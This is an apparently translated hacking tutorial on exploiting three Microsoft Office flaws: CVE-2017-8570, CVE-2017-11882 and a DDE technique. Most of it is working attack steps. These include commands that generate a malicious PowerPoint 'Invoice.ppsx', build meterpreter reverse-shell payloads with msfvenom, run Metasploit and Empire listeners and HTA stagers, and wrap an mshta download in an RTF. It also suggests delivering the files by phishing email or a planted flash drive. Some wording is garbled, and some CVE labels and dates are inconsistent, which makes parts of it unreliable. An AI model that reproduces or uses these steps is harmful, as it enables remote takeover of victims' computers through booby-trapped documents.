Correct processing of OLE responses (CVE-2017-8570). When an infected document is opened, the app makes a request to a remote server to retrieve the file embedded in that document. The server returns a specially generated response. It contains a malicious file
This problem became known in April 2017, and in August another important episode took place: Cisco analyst department told us about a new vulnerability related to this, CVE-2017-0199. Whereas earlier Rich Text File (RTF) documents were used for attacks, the new threat was related to PowerPoint (.ppsx) files.
Principle of work
The attack using this vulnerability develops according to a very simple scenario: the user receives an email with a malicious Word document and tricks the victim to open the attachments. Inside the document there is an OLE2link object hidden. If the victim uses Protected View, the exploit will not work, but if this mode is disabled, an HTTP request will be sent to the attacker’s server and will upload an HTA file disguised as RTF.
When the HTA file is uploaded, it will be executed automatically. This way the exploit is triggered and the original Word document is closed. Instead, a fake document will open, designed to put the victim’s vigilance to sleep.
The first thing we do is go to GitHub and watch the exploits. I will use
Office8570 we create the folder
template and move the downloaded file
template.ppsx to it.
Now run the script to generate a PPSX file with payload:
$ python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc.
Specify the victim IP (in my case it is 192.168.0.104) and we see that the file
Invoice.ppsx has appeared.
Next, using Metasploit, we create a payload as a
shell.exe file in the
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe
The matter is done, now we start the listener, who will check the port:
$ msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"
To make everything work, we just have to do one more action – to prescribe a command to run the local server on port 80.
$ python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe
And the final step is to transfer the infected PowerPoint presentation file (
Invoice.ppsx) to the victim machine. How is it another question. It is possible to prepare a phishing email, to plant a flash drive or something like that. When the victim opens the file on his machine, the exploit will work and we will get a wind-schell.
You can watch the bug demonstration on video.
Buffer overflow in formula editor (CVE-2017-11882)
This dangerous bug, which allows to execute code without interacting with the user, existed for 17 years.
The researchers explain that the problem has to do with Microsoft Equation Editor (EQNEDT32.EXE). It would seem to be a harmless formula editor! But this file was last compiled on November 9, 2000. Of course, it does not meet modern security standards. In Office 2007 this component was replaced by a new version, but the old one was not removed – people need to open old documents, right?
EQNEDT32.EXE analysts found two bug files in EQNEDT32.EXE related to data integrity impairment in memory (buffer overflow). Introduction of malicious OLE objects exploiting these vulnerabilities into the document allows arbitrary code execution on the machine, including downloading any file from a remote server and executing it.
$ git clone https://github.com/Ridter/CVE-2017-11882
$ cd CVE-2017-11882
$ chmod +x Command109b_CVE-2017-11882.py
$ chmod +x Command43b_CVE-2017-11882.py
Now we will need another hacker framework – Empire. With this framework we will create listeners. In case you are not familiar with Empire, I will explain that the “listener” is represented by our IP and the port where we will meet the connection from the victim machine.
$ git clone https://github.com/adaptivethreat/Empire.git
Now you can start and look at the available commands by typing
We write the following commands to create listeners:
Set the initial settings:
set <Name http>– specify name of HTTP listener;
set <Host ip>– write an ip directory where to go
set <Port>– write on which port to knock;
Once everything is done, we return to the main menu with the command
Create the HTA load with the following commands:
usestager windows/hta– align the module we need;
set Listener http– activate HTTP listener;
set OutFile /tmp/hack1.hta– specify the path to save the file and give it a non-professional name;
execute– complete the generation and exit the menu.
Almost all done! Now we need to go to
/tmp and get our
hackl.hta battle file out of there. This is what we will run on the victim machine.
The HTA (HTML Application) format allows opening HTML documents without a browser. Launches mshta.exe applications that use the
RunHTMLApplication function (undocumented). This executable in Windows has the .hta extension by default.
Since not every user would dare run an HTA on their wheelbarrow, we will wrap it in a Word document. The documents are harmless, everyone knows that!
We go back to the console and write the following:
$ python Command109b_CVE-2017-11882.py -c "mshta <link>". -o Example.rtf
mshta <link> is the URL of the
hack1.hta file that lies on our server.
Now the file needs to be delivered to the target machine. As soon as it is opened, the connection that we access PowerShell will rise.
Exploitation of DDE (CVE-2017-11826)
On October 10, 2018, researchers from the Chinese company Qihoo 360 reported a zero-day vulnerability in Microsoft Office, which has already been actively exploited by attackers: they organized a campaign aimed at businesses. The attack was different in that it did not use OLE objects or macros.
From the victim’s perspective, the attack looks like this. An email with an attached document comes in, we open it and see the following message.
If you press the Yes button, another message will appear.
And one more thing.
Below is a tree view of the process. This can be observed when the exploit is working correctly.
Principle of work
The technique of this attack is based on a rather old Microsoft Dynamic Data Exchange (DDE) feature, which allows one Office application to download data from other applications. For example, a table in a Word file can be automatically updated every time the file is launched and the data will be pulled from the Excel file.
Usually, when a DDE is triggered, an application shows the user two warnings, which can be seen in the illustration below. And experts note that the second warning, which informs about an error, may not always be displayed.
The main problem here is that users who often work with DDE do not pay any attention to these messages. Such warnings have already become something so familiar that they are closed without looking.
The researchers, including employees of the companies SensePost and Cisco Talos, more than once noted that DDE is often exploited by hackers, and tried to convey the problem to the specialists of Microsoft, but those long refused to recognize this vulnerability, until finally released a patch ADV170021, closing the hole.
The ability to exploit DDE to attack really is not a vulnerability in the usual sense of the word. After all, Office honestly warns the user about the potential danger. The situation is almost similar to the problems with macros and OLE.
Meanwhile, DDE attacks are practiced by serious hacker groups, in particular FIN7, known for large-scale attacks on financial organizations. And the patch prevents this, but it is still far from being installed everywhere.
How to enable DDE back
In fact, the patch only makes minor registry changes and deactivates DDE by default. To enable this feature again, you just need to change the value of one key:
The value of this dword may be one of the following:
AllowDDE(DWORD) = 0– disables DDE. Once the update is installed, this is the default;
AllowDDE> - disables DDE.
AllowDDE(DWORD) = 1– allows DDE requests to programs already running but does not allow new programs to run;
AllowDDE(DWORD) = 2– allows any requests.
Let’s see how to get an active session on a remote host (Windows 8.1, Windows 7, Windows Server 2008). For this we use a script in Python which generates an RTF file. Everything you need is included in the Metasploit Framework.
The corresponding module creates malicious RTF – if you open it in vulnerable versions of Word, the code will be executed. Vulnerability is that OLE object can make HTTP(S) request and execute HTA code in response.
Let’s get started.
> use exploit/windows/fileformat/office_word_hta.
> set srvhost 192.168.0.106
> set payload windows/meterpreter/reverse_tcp
> set filename order.doc
> set lhost 192.168.0.106
The link highlighted in red must be delivered to the target host.
If you navigate through it and run the downloaded file, the active session will open.
sysinfo to make sure it is a victory.
We have examined three serious vulnerabilities that are fully exploited by abusers. All three bugs are already to some extent covered by patches and have some limitations, but old versions of Office are so common that vulnerabilities will remain relevant for a long time.
Remember: updates are not a whim of Microsoft at all, patches are one of the mandatory security conditions. But it is not the only one. Months sometimes pass between the detection of a problem and its fixing, so even if you correctly update the document, there is always a chance to come across a document with a surprise.